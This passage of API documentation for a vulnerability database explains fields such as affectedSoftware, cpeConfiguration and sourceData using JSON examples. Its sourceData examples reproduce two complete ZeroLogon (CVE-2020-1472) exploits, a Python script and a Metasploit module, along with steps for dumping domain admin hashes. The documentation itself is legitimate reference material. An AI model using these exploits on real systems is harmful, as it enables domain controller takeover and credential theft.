"THREATPOST:18C67680771D8DB6E95B3E3C7854114F",
"THREATPOST:558A7B1DE564A8E368D33E86E291AB77",
"THREATPOST:AD4EF56E5440159F6E37D8B403C253D7",
"THREATPOST:710993CAB7FA720A00E40DD95C61087B",
"THREATPOST:71C45E867DCD99278A38088B59938B48",
"THREATPOST:2E607CF584AE6639AC690F7F0CE8C648"
]
},
{
"type": "cisa",
"idList": [
"CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C",
"CISA:10689A7EB0060FEA79F8CE394E1E29A7",
"CISA:040FDAD04D5D46EE1B966151F70C1621",
"CISA:134C272F26FB005321448C648224EB02",
"CISA:5210B7B2A0F699859FA5687AE54998B8",
"CISA:3219D2E89DB1680D9EF6F22691FC5829"
]
},
{
"type": "redhatcve",
"idList": [
"RH:CVE-2019-7609"
]
},
{
"type": "attackerkb",
"idList": [
"AKB:9B4E2AEC-697D-42F0-9FED-B010FB1F82ED",
"AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65",
"AKB:236680FB-F804-4F5D-B51D-4B50C9F69BBD",
"AKB:0DE629AA-DABB-4803-9039-23808F323AAF",
"AKB:35B88369-C440-49C0-98FF-C50E258FB32C",
"AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502",
"AKB:B3E0B6D7-814D-4DB3-BA2B-8C2F79B7BE7B",
"AKB:5D17BB38-86BB-4514-BF1D-39EB48FBE4F1",
"AKB:E88B8795-0434-4AC5-B3D5-7E3DAB8A60C1",
"AKB:A9AE03FD-3BC8-4CF3-AD03-9708A6A4FFA2"
]
},
{
"type": "wallarmlab",
"idList": [
"WALLARMLAB:7A0E7E3752712070F3E75CEF26AC2CC0"
]
},
{
"type": "hackerone",
"idList": [
"H1:1119224",
"H1:680480",
"H1:1119228"
]
},
{
"type": "nessus",
"idList": [
"PULSE_CONNECT_SECURE-CVE-2019-11510.NASL",
"F5_CVE-2020-5902.NASL",
"ZIMBRA_8_7_11P10.NASL",
"VMWARE_WORKSPACE_ONE_ACCESS_CVE-2020-4006.NASL",
"VMWARE_VCENTER_VMSA-2021-0002.NASL"
]
},
{
"type": "symantec",
"idList": [
"SMNTC-111238"
]
},
{
"type": "f5",
"idList": [
"F5:K90059138"
]
},
{
"type": "qualysblog",
"idList": [
"QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54",
"QUALYSBLOG:66E92B63FC165BEAF707A9D6B2807033"
]
},
{
"type": "impervablog",
"idList": [
"IMPERVABLOG:1DB28979DC434D618FB773C7834FB207"
]
},
{
"type": "rapid7blog",
"idList": [
"RAPID7BLOG:8E02D06635B184C252A0274FC4A163A6",
"RAPID7BLOG:7F5516EB3D3811BAE47D74129049D93F",
"RAPID7BLOG:6A1F743B64899419F505BFE243BD179F"
]
},
{
"type": "citrix",
"idList": [
"CTX267027"
]
},
{
"type": "myhack58",
"idList": [
"MYHACK58:62201994562"
]
},
{
"type": "trendmicroblog",
"idList": [
"TRENDMICROBLOG:3981EF309A794B1CC15F5BBC6C2B181B"
]
},
{
"type": "exploitdb",
"idList": [
"EDB-ID:49663",
"EDB-ID:49602",
"EDB-ID:48643",
"EDB-ID:48711"
]
},
{
"type": "packetstorm",
"idList": [
"PACKETSTORM:161590",
"PACKETSTORM:158581",
"PACKETSTORM:161527",
"PACKETSTORM:161806",
"PACKETSTORM:161695",
"PACKETSTORM:161846"
]
},
{
"type": "metasploit",
"idList": [
"MSF:AUXILIARY/GATHER/EXCHANGE_PROXYLOGON_COLLECTOR/"
]
},
{
"type": "mmpc",
"idList": [
"MMPC:FC03200E57A46D16A8CD1A5A0E647BB3",
"MMPC:9AAC6D759E6AD62F92B56B228C39C263"
]
},
{
"type": "saint",
"idList": [
"SAINT:192E33BC51A49F81EC3C52F0E8A72432",
"SAINT:8E748D4A2FD6DFA108D87FF09FFEF2AE"
]
},
{
"type": "mssecure",
"idList": [
"MSSECURE:E3C8B97294453D962741782EC959E79C",
"MSSECURE:FC03200E57A46D16A8CD1A5A0E647BB3",
"MSSECURE:9AAC6D759E6AD62F92B56B228C39C263"
]
},
{
"type": "securelist",
"idList": [
"SECURELIST:35644FF079836082B5B728F8E95F0EDD"
]
},
{
"type": "openvas",
"idList": [
"OPENVAS:1361412562310143092"
]
},
{
"type": "krebs",
"idList": [
"KREBS:62A9210BE77EF6D125F9EE7EA1C212B5",
"KREBS:4E28B87E4ED6A80CD9C56DCC97A7C14F"
]
},
{
"type": "cert",
"idList": [
"VU:724367"
]
},
{
"type": "dsquare",
"idList": [
"E-709"
]
},
{
"type": "zdt",
"idList": [
"1337DAY-ID-34647",
"1337DAY-ID-34652"
]
}
],
"modified": "2021-05-08T12:36:32",
"rev": 2
},
"score": {
"value": 7.5,
"vector": "NONE",
"modified": "2021-05-08T12:36:32",
"rev": 2
},
"vulnersScore": 7.5
}
affectedSoftware¶
List of software, which have subkeys. It is a simplified description of applicability. Logical OR, and if at least one condition is met, the vulnerability is applicable.
- name: name of software. Format: String
- version: version of software. Format: String
Examples:
"id": "CVE-2020-1472"
"id": "CVE-2019-0230"
Example link: CVE-2020-1472
"affectedSoftware": [
{
"cpeName": "synology:directory_server",
"name": "synology directory server",
"operator": "lt",
"version": "4.4.5-0101"
},
{
"cpeName": "samba:samba",
"name": "samba",
"operator": "lt",
"version": "4.12.7"
},
{
"cpeName": "microsoft:windows_server_2008",
"name": "microsoft windows server 2008",
"operator": "eq",
"version": "r2"
},
{
"cpeName": "microsoft:windows_server_2016",
"name": "microsoft windows server 2016",
"operator": "eq",
"version": "1903"
},
{
"cpeName": "microsoft:windows_server_2019",
"name": "microsoft windows server 2019",
"operator": "eq",
"version": "-"
},
{
"cpeName": "microsoft:windows_server_2016",
"name": "microsoft windows server 2016",
"operator": "eq",
"version": "1909"
},
{
"cpeName": "microsoft:windows_server_2012",
"name": "microsoft windows server 2012",
"operator": "eq",
"version": "r2"
},
{
"cpeName": "microsoft:windows_server_2016",
"name": "microsoft windows server 2016",
"operator": "eq",
"version": "2004"
},
{
"cpeName": "canonical:ubuntu_linux",
"name": "canonical ubuntu linux",
"operator": "eq",
"version": "16.04"
},
{
"cpeName": "fedoraproject:fedora",
"name": "fedoraproject fedora",
"operator": "eq",
"version": "33"
},
{
"cpeName": "canonical:ubuntu_linux",
"name": "canonical ubuntu linux",
"operator": "eq",
"version": "14.04"
},
{
"cpeName": "canonical:ubuntu_linux",
"name": "canonical ubuntu linux",
"operator": "eq",
"version": "18.04"
},
{
"cpeName": "opensuse:leap",
"name": "opensuse leap",
"operator": "eq",
"version": "15.2"
},
{
"cpeName": "microsoft:windows_server_2012",
"name": "microsoft windows server 2012",
"operator": "eq",
"version": "-"
},
{
"cpeName": "fedoraproject:fedora",
"name": "fedoraproject fedora",
"operator": "eq",
"version": "32"
},
{
"cpeName": "opensuse:leap",
"name": "opensuse leap",
"operator": "eq",
"version": "15.1"
},
{
"cpeName": "microsoft:windows_server_2016",
"name": "microsoft windows server 2016",
"operator": "eq",
"version": "-"
},
{
"cpeName": "samba:samba",
"name": "samba",
"operator": "lt",
"version": "4.10.18"
},
{
"cpeName": "samba:samba",
"name": "samba",
"operator": "lt",
"version": "4.11.13"
}
]
Example link: CVE-2019-0230
"affectedSoftware": [
{
"cpeName": "oracle:financial_services_data_integration_hub",
"name": "oracle financial services data integration hub",
"operator": "eq",
"version": "8.0.3"
},
{
"cpeName": "oracle:financial_services_data_integration_hub",
"name": "oracle financial services data integration hub",
"operator": "eq",
"version": "8.0.6"
},
{
"cpeName": "apache:struts",
"name": "apache struts",
"operator": "le",
"version": "2.5.20"
},
{
"cpeName": "oracle:financial_services_market_risk_measurement_and_management",
"name": "oracle financial services market risk measurement and management",
"operator": "eq",
"version": "8.0.6"
}
]
cpeConfiguration¶
It is a logical tree AND, OR, NOT, with the most accurate description of applicability.
Examples:
"id": "CVE-2020-1472"
"id": "CVE-2019-0230"
Example link: CVE-2020-1472
"cpeConfiguration": {
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:canonical:ubuntu_linux:14.04:*:*:*:esm:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:samba:samba:4.10.18:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.10.18",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:samba:samba:4.12.7:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.12.7",
"versionStartIncluding": "4.12.0",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:samba:samba:4.11.13:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.11.13",
"versionStartIncluding": "4.11.0",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:synology:directory_server:4.4.5-0101:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "4.4.5-0101",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:opensuse:leap:15.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
Example link: CVE-2019-0230
"cpeConfiguration": {
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:oracle:financial_services_data_integration_hub:8.0.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:apache:struts:2.5.20:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "2.5.20",
"versionStartIncluding": "2.0.0",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
affectedPackage¶
List of packages, which have subkeys.
- packageName: Name of package. Format: String
- packageVersion: Version of package. Format: String
- packageFilename: Filename of package. Format: String
Examples:
"id": "UB:CVE-2017-9805"
"id": "UB:CVE-2019-0230"
Example link: CVE-2017-9805
"affectedPackage": [
{
"OS": "ubuntu",
"OSVersion": "Upstream",
"arch": "noarch",
"packageVersion": "any",
"packageFilename": "UNKNOWN",
"operator": "lt",
"packageName": "libstruts1.2-java"
}
]
Example link: CVE-2019-0230
"affectedPackage": [
{
"OS": "ubuntu",
"OSVersion": "Upstream",
"arch": "noarch",
"packageVersion": "any",
"packageFilename": "UNKNOWN",
"operator": "lt",
"packageName": "libstruts1.2-java"
}
]
sourceData¶
Relevant field for exploit and scanner bulletinFamily. Search in exploit source code or vulnerability availability check in the scanner.
Examples:
"id": "REDHAT-RHSA-2020-5439.NASL",
"type": "nessus",
"bulletinFamily": "scanner"
"id": "OPENVAS:1361412562310815862",
"type": "openvas",
"bulletinFamily": "scanner"
"id": "EDB-ID:49071",
"type": "exploitdb",
"bulletinFamily": "exploit"
"id": "MSF:AUXILIARY/ADMIN/DCERPC/CVE_2020_1472_ZEROLOGON/",
"type": "metasploit",
"bulletinFamily": "exploit"
Example link: Microsoft Windows Multiple Vulnerabilities (KB4530689)
"sourceData": "# Exploit Title: ZeroLogon - Netlogon Elevation of Privilege\r\n# Date: 2020-10-04\r\n# Exploit Author: West Shepherd\r\n# Vendor Homepage: https://www.microsoft.com\r\n# Version: Microsoft Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2\r\n# Tested on: Microsoft Windows Server 2016 Standard x64\r\n# CVE : CVE-2020-1472\r\n# Credit to: Tom Tervoort for discovery and Dirk-Janm for Impacket code\r\n# Sources: https://www.secura.com/pathtoimg.php?id=2055\r\n# Requirements: python3 and impacket 0.9.21+ (tested using this version)\r\n#!/usr/bin/env python3\r\nimport hmac, hashlib, struct, sys, socket, time, argparse, logging, codecs\r\nfrom binascii import hexlify, unhexlify\r\nfrom subprocess import check_call\r\nfrom impacket.dcerpc.v5.dtypes import NULL, MAXIMUM_ALLOWED\r\nfrom impacket.dcerpc.v5 import nrpc, epm, transport\r\nfrom impacket import crypto, version\r\nfrom impacket.examples import logger\r\nfrom Cryptodome.Cipher import AES\r\nfrom struct import pack, unpack\r\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\r\n\r\n\r\nclass Exploit:\r\n def __init__(\r\n self,\r\n name='',\r\n address='',\r\n attempts=2000,\r\n password=''\r\n ):\r\n name = name.rstrip('$')\r\n self.secureChannelType = nrpc.NETLOGON_SECURE_CHANNEL_TYPE\\\r\n .ServerSecureChannel\r\n self.authenticator = self.getAuthenticator(stamp=0)\r\n self.clearNewPasswordBlob = b'\\x00' * 516\r\n self.primaryName = ('\\\\\\\\%s' % name) + '\\x00'\r\n self.accountName = ('%s$' % name) + '\\x00'\r\n self.computerName = name + '\\x00'\r\n self.clientCredential = b'\\x00' * 8\r\n self.clientChallenge = b'\\x00' * 8\r\n self.negotiateFlags = 0x212fffff\r\n self.address = address\r\n self.max = attempts\r\n self.dce = None\r\n self.sessionKey = None\r\n self.clientStoredCredential = None\r\n self.password = password\r\n\r\n def encodePassword(self, password):\r\n if isinstance(password, str):\r\n password = password.encode('utf-8')\r\n return b'\\x00' * (512 - len(password))\\\r\n + password \\\r\n + pack('<L', len(password))\r\n\r\n def getAuthenticator(self, creds=b'\\x00' * 8, stamp=10):\r\n authenticator = nrpc.NETLOGON_AUTHENTICATOR()\r\n authenticator['Credential'] = creds\r\n authenticator['Timestamp'] = stamp\r\n return authenticator\r\n\r\n def serverReqChallenge(self):\r\n try:\r\n binding = epm.hept_map(\r\n self.address, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp'\r\n )\r\n self.dce = transport.DCERPCTransportFactory(binding).get_dce_rpc()\r\n self.dce.connect()\r\n self.dce.bind(nrpc.MSRPC_UUID_NRPC)\r\n return nrpc.hNetrServerReqChallenge(\r\n self.dce,\r\n self.primaryName,\r\n self.computerName,\r\n self.clientChallenge\r\n )\r\n except BaseException as ex:\r\n self.logError(ex)\r\n\r\n def serverAuthenticate(self):\r\n try:\r\n auth = nrpc.hNetrServerAuthenticate3(\r\n self.dce,\r\n self.primaryName,\r\n self.accountName,\r\n self.secureChannelType,\r\n self.computerName,\r\n self.clientCredential,\r\n self.negotiateFlags\r\n )\r\n assert auth['ErrorCode'] == 0\r\n self.logInfo('successfully authenticated')\r\n return True\r\n except nrpc.DCERPCSessionError as ex:\r\n self.dce = None\r\n if ex.get_error_code() == 0xc0000022:\r\n return None\r\n else:\r\n self.logFail(ex.get_error_code())\r\n except BaseException as ex:\r\n self.dce = None\r\n self.logFail(ex)\r\n self.dce = None\r\n\r\n def serverPasswordSet(self):\r\n try:\r\n return nrpc.hNetrServerPasswordSet2(\r\n self.dce,\r\n self.primaryName,\r\n self.accountName,\r\n self.secureChannelType,\r\n self.computerName,\r\n self.authenticator,\r\n self.clearNewPasswordBlob\r\n )\r\n except BaseException as ex:\r\n self.logError(ex)\r\n\r\n def authenticate(self):\r\n self.logInfo(\r\n 'checking target, attempting to authenticate %d max\r\nattempts' % self.max\r\n )\r\n for attempt in range(0, self.max):\r\n self.logInfo('attempt %d' % attempt)\r\n self.serverReqChallenge()\r\n self.serverAuthenticate()\r\n if self.dce is not None:\r\n break\r\n if self.dce:\r\n return True\r\n else:\r\n self.logError('failed to authenticate')\r\n\r\n def exploit(self):\r\n self.logInfo('attempting password reset')\r\n reset = self.serverPasswordSet()\r\n if reset['ErrorCode'] == 0:\r\n self.logInfo('successfully reset password')\r\n else:\r\n self.logError('failed to reset password')\r\n return self\r\n\r\n def ComputeNetlogonCredentialAES(self, challenge):\r\n return nrpc.ComputeNetlogonCredentialAES(\r\n challenge,\r\n self.sessionKey\r\n )\r\n\r\n def logInfo(self, message):\r\n sys.stdout.write(\"[+] %s\\n\" % str(message))\r\n return self\r\n\r\n def logError(self, message):\r\n sys.stderr.write(\"[-] error %s\\n\" % str(message))\r\n\r\n def logFail(self, message):\r\n sys.stderr.write(\"[!] failure %s\\n\" % str(message))\r\n sys.exit(2)\r\n\r\n def restore(self):\r\n self.logInfo('attempting to restore password')\r\n self.clientChallenge = b'12345678'\r\n try:\r\n self.primaryName = NULL\r\n challenge = self.serverReqChallenge()\r\n self.sessionKey = nrpc.ComputeSessionKeyAES(\r\n '', self.clientChallenge, challenge['ServerChallenge']\r\n )\r\n self.clientCredential = self.ComputeNetlogonCredentialAES(\r\n self.clientChallenge\r\n )\r\n try:\r\n self.serverAuthenticate()\r\n except Exception as e:\r\n if str(e).find('STATUS_DOWNGRADE_DETECTED') < 0:\r\n raise\r\n self.logInfo('restoring password')\r\n self.clientStoredCredential = pack('<Q', unpack('<Q',\r\nself.clientCredential)[0] + 10)\r\n self.authenticator = self.getAuthenticator(\r\n\r\ncreds=self.ComputeNetlogonCredentialAES(self.clientStoredCredential)\r\n )\r\n self.clearNewPasswordBlob = self.ComputeNetlogonCredentialAES(\r\n self.encodePassword(self.password)\r\n )\r\n reset = self.serverPasswordSet()\r\n if reset['ErrorCode'] == 0:\r\n self.logInfo('successfully restored password')\r\n else:\r\n self.logError('failed to restore password')\r\n except Exception as ex:\r\n self.logError(ex)\r\n return self\r\n\r\n\r\nif __name__ == '__main__':\r\n info = \"\"\"\r\nNOTE - Exploitation will break the DC until restored, recommended guidelines:\r\n\r\n 1. Check the DC - usually ~300 attempts, use the NETBIOS name not the FQDN:\r\n cve-2020-1472.py -do check -target <NETBIOS NAME> -ip <IP>\r\n\r\n 2. Exploit the DC - this will break the DC until restored:\r\n cve-2020-1472.py -do exploit <NETBIOS NAME> -ip <IP>\r\n\r\n 3. Dump the DC - for the DA hashes, this will not contain the\r\nmachine hex-pass:\r\n secretsdump.py -just-dc -no-pass <NETBIOS NAME>\\$@<IP>\r\n\r\n 4. Dump the DC again - use the DA hash to get the machines hex-pass:\r\n secretsdump.py -no-pass -hashes <LMHASH>:<NTHASH> <DOMAIN>/<ADMIN>@<IP>\r\n\r\n 5. Restore target - this fixes the DC:\r\n cve-2020-1472.py -do restore -target <NETBIOS NAME> -ip <IP>\r\n-hex <HEXPASS>\r\n\"\"\"\r\n parser = argparse.ArgumentParser(\r\n description='CVE-2020-1472 ZeroLogon Exploit - Netlogon\r\nElevation of Privilege',\r\n add_help=True\r\n )\r\n try:\r\n parser.add_argument('-do', default='check', action='store',\r\n help='What to do (default check):\r\n[check|restore|exploit]')\r\n parser.add_argument('-target', action='store',\r\n help='NETBIOS name of target DC (not the FQDN)')\r\n parser.add_argument('-ip', action='store',\r\n help='IP address of target DC')\r\n parser.add_argument('-password', default='', action='store',\r\n help='The plaintext password to use to\r\nreset the DC')\r\n parser.add_argument('-hex', default='', action='store',\r\n help='The hex password to use to restore\r\nthe DC (recommended)')\r\n parser.add_argument('-max', default=2000, action='store',\r\n help='Max attempts to authenticate with\r\nthe DC (usually ~300 or less)')\r\n\r\n if len(sys.argv) < 3:\r\n parser.print_help()\r\n print(info)\r\n sys.exit(1)\r\n options = parser.parse_args()\r\n\r\n if options.do.lower() == 'check':\r\n Exploit(\r\n name=options.target,\r\n address=options.ip,\r\n attempts=int(options.max)\r\n ).authenticate()\r\n elif options.do.lower() == 'exploit':\r\n exp = Exploit(\r\n name=options.target,\r\n address=options.ip,\r\n attempts=int(options.max)\r\n )\r\n if exp.authenticate():\r\n exp.exploit()\r\n elif options.do.lower() == 'restore':\r\n if options.hex != '' and options.password == '':\r\n options.password = unhexlify(options.hex)\r\n if options.password != '':\r\n exp = Exploit(\r\n name=options.target,\r\n address=options.ip,\r\n password=options.password\r\n ).restore()\r\n else:\r\n parser.print_help()\r\n\r\n except Exception as error:\r\n sys.stderr.write('[-] error in main %s\\n' % str(error))"
Example link: Microsoft Windows Multiple Vulnerabilities (KB4530689)
"sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Auxiliary::Report\n\n CheckCode = Exploit::CheckCode\n Netlogon = RubySMB::Dcerpc::Netlogon\n EMPTY_SHARED_SECRET = OpenSSL::Digest.digest('MD4', '')\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Netlogon Weak Cryptographic Authentication',\n 'Description' => %q{\n A vulnerability exists within the Netlogon authentication process where the security properties granted by AES\n are lost due to an implementation flaw related to the use of a static initialization vector (IV). An attacker\n can leverage this flaw to target an Active Directory Domain Controller and make repeated authentication attempts\n using NULL data fields which will succeed every 1 in 256 tries (~0.4%). This module leverages the vulnerability\n to reset the machine account password to an empty string, which will then allow the attacker to authenticate as\n the machine account. After exploitation, it's important to restore this password to it's original value. Failure\n to do so can result in service instability.\n },\n 'Author' => [\n 'Tom Tervoort', # original vulnerability details\n 'Spencer McIntyre', # metasploit module\n 'Dirk-jan Mollema' # password restoration technique\n ],\n 'Notes' => {\n 'AKA' => [ 'Zerologon' ]\n },\n 'License' => MSF_LICENSE,\n 'Actions' => [\n [ 'REMOVE', { 'Description' => 'Remove the machine account password' } ],\n [ 'RESTORE', { 'Description' => 'Restore the machine account password' } ]\n ],\n 'DefaultAction' => 'REMOVE',\n 'References' => [\n [ 'CVE', '2020-1472' ],\n [ 'URL', 'https://www.secura.com/blog/zero-logon' ],\n [ 'URL', 'https://github.com/SecuraBV/CVE-2020-1472/blob/master/zerologon_tester.py' ],\n [ 'URL', 'https://github.com/dirkjanm/CVE-2020-1472/blob/master/restorepassword.py' ]\n ]\n )\n )\n\n register_options(\n [\n OptPort.new('RPORT', [ false, 'The netlogon RPC port' ]),\n OptString.new('NBNAME', [ true, 'The server\\'s NetBIOS name' ]),\n OptString.new('PASSWORD', [ false, 'The password to restore for the machine account (in hex)' ], conditions: %w[ACTION == RESTORE]),\n ]\n )\n end\n\n def peer\n \"#{rhost}:#{@dport || datastore['RPORT']}\"\n end\n\n def bind_to_netlogon_service\n @dport = datastore['RPORT']\n if @dport.nil? || @dport == 0\n @dport = dcerpc_endpoint_find_tcp(datastore['RHOST'], Netlogon::UUID, '1.0', 'ncacn_ip_tcp')\n fail_with(Failure::NotFound, 'Could not determine the RPC port used by the Microsoft Netlogon Server') unless @dport\n end\n\n # Bind to the service\n handle = dcerpc_handle(Netlogon::UUID, '1.0', 'ncacn_ip_tcp', [@dport])\n print_status(\"Binding to #{handle} ...\")\n dcerpc_bind(handle)\n print_status(\"Bound to #{handle} ...\")\n end\n\n def check\n bind_to_netlogon_service\n\n status = nil\n 2000.times do\n netr_server_req_challenge\n response = netr_server_authenticate3\n\n break if (status = response.error_status) == 0\n end\n\n return CheckCode::Detected unless status == 0\n\n CheckCode::Vulnerable\n end\n\n def run\n case action.name\n when 'REMOVE'\n action_remove_password\n when 'RESTORE'\n action_restore_password\n end\n end\n\n def action_remove_password\n fail_with(Failure::Unknown, 'Failed to authenticate to the server by leveraging the vulnerability') unless check == CheckCode::Vulnerable\n\n print_good('Successfully authenticated')\n\n report_vuln(\n host: rhost,\n port: @dport,\n name: name,\n sname: 'dcerpc',\n proto: 'tcp',\n refs: references,\n info: \"Module #{fullname} successfully authenticated to the server without knowledge of the shared secret\"\n )\n\n response = netr_server_password_set2\n status = response.error_status.to_i\n fail_with(Failure::UnexpectedReply, \"Password change failed with NT status: 0x#{status.to_s(16)}\") unless status == 0\n\n print_good(\"Successfully set the machine account (#{datastore['NBNAME']}$) password to: aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 (empty)\")\n end\n\n def action_restore_password\n fail_with(Failure::BadConfig, 'The RESTORE action requires the PASSWORD option to be set') if datastore['PASSWORD'].blank?\n fail_with(Failure::BadConfig, 'The PASSWORD option must be in hex') if /^([0-9a-fA-F]{2})+$/ !~ datastore['PASSWORD']\n password = [datastore['PASSWORD']].pack('H*')\n\n bind_to_netlogon_service\n client_challenge = OpenSSL::Random.random_bytes(8)\n\n response = netr_server_req_challenge(client_challenge: client_challenge)\n session_key = Netlogon.calculate_session_key(EMPTY_SHARED_SECRET, client_challenge, response.server_challenge)\n ppp = Netlogon.encrypt_credential(session_key, client_challenge)\n\n response = netr_server_authenticate3(client_credential: ppp)\n fail_with(Failure::NoAccess, 'Failed to authenticate (the machine account password may not be empty)') unless response.error_status == 0\n\n new_password_data = (\"\\x00\" * (512 - password.length)) + password + [password.length].pack('V')\n response = netr_server_password_set2(\n authenticator: Netlogon::NetlogonAuthenticator.new(\n credential: Netlogon.encrypt_credential(session_key, [ppp.unpack1('Q') + 10].pack('Q')),\n timestamp: 10\n ),\n clear_new_password: Netlogon.encrypt_credential(session_key, new_password_data)\n )\n status = response.error_status.to_i\n fail_with(Failure::UnexpectedReply, \"Password change failed with NT status: 0x#{status.to_s(16)}\") unless status == 0\n\n print_good(\"Successfully set machine account (#{datastore['NBNAME']}$) password\")\n end\n\n def netr_server_authenticate3(client_credential: \"\\x00\" * 8)\n nrpc_call('NetrServerAuthenticate3',\n primary_name: \"\\\\\\\\#{datastore['NBNAME']}\",\n account_name: \"#{datastore['NBNAME']}$\",\n secure_channel_type: :ServerSecureChannel,\n computer_name: datastore['NBNAME'],\n client_credential: client_credential,\n flags: 0x212fffff)\n end\n\n def netr_server_password_set2(authenticator: nil, clear_new_password: \"\\x00\" * 516)\n authenticator ||= Netlogon::NetlogonAuthenticator.new(credential: \"\\x00\" * 8, timestamp: 0)\n nrpc_call('NetrServerPasswordSet2',\n primary_name: \"\\\\\\\\#{datastore['NBNAME']}\",\n account_name: \"#{datastore['NBNAME']}$\",\n secure_channel_type: :ServerSecureChannel,\n computer_name: datastore['NBNAME'],\n authenticator: authenticator,\n clear_new_password: clear_new_password)\n end\n\n def netr_server_req_challenge(client_challenge: \"\\x00\" * 8)\n nrpc_call('NetrServerReqChallenge',\n primary_name: \"\\\\\\\\#{datastore['NBNAME']}\",\n computer_name: datastore['NBNAME'],\n client_challenge: client_challenge)\n end\n\n def nrpc_call(name, **kwargs)\n request = Netlogon.const_get(\"#{name}Request\").new(**kwargs)\n\n begin\n raw_response = dcerpc.call(request.opnum, request.to_binary_s)\n rescue Rex::Proto::DCERPC::Exceptions::Fault\n fail_with(Failure::UnexpectedReply, \"The #{name} Netlogon RPC request failed\")\n end\n\n Netlogon.const_get(\"#{name}Response\").read(raw_response)\n end\nend\n"
bounty¶
hackerone.com bounty amount. Format: Double
Examples:
"bounty": 1800"bounty": 200"bounty": 0
type:rst¶
IoC feed containing default fields (published, tags, threat, descr, iocScore, etc) and specific fields for each IoC type:
- ip:
geodata,asn - url: default fields
- domain:
whois,geodata,asn
Examples:
"geodata": { "city": "Aachen", "country": "Germany", "region": "North RhineWestphalia" }
Keywords can be added to this section.